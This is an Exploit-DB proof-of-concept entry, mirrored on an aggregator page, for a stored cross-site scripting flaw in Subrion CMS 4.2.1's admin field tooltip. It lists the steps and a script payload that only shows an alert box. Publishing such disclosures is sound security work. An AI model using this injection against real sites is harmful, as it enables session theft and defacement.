[webapps] Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
2023-3-28 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:13 收藏

# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
# Date: 2022-08-10
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://intelliants.com/
# Version: 4.2.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/panel/fields/add
2- Write XSS Payload into the tooltip value of the field add page.
3- Press "Save" button.
4- Go to the following url. => http://(HOST)/panel/members/add

XSS Payload ==> "<script>alert("field_tooltip_XSS")</script> 

Reference: ://github.com/intelliants/subrion/issues/895
            

文章来源: https://www.exploit-db.com/exploits/51110
如有侵权请联系:admin#unsafe.sh